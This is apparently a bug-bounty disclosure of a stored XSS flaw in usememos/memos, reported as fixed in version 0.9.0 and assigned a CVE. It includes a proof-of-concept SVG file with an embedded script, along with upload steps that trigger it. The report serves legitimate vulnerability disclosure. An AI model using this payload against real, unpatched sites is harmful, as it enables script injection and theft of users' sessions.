Stored XSS via SVG File in usememos/memos

Valid

Reported on

Dec 20th 2022

Description

usememos has a feature to upload file and display it. By uploading a crafted SVG files, the users can perform Stored XSS attack with the image direct link.

Copy the following code and save as filename.svg.

Proof of Concept (filename.svg)

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>
  1. Login as user
  2. create a new post and upload the svg file
  3. save the post
  4. take the direct link of the image and open it in a new tab
  5. see XSS (example link: https://<yoursite>/o/r/8/filename.svg).

if you need more specific information, feel free to contact me.

Impact

If an attacker can execute the script in the victim's browser via SVG file, they might compromise that user by stealing its cookies and other malicious things.

We are processing your report and will contact the usememos/memos team within 24 hours. 20 days ago
We have contacted a member of the usememos/memos team and are waiting to hear back 19 days ago
STEVEN validated this vulnerability 18 days ago
Hakiduck has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
STEVEN marked this as fixed in 0.9.0 with commit c07b4a 17 days ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability 17 days ago
to join this conversation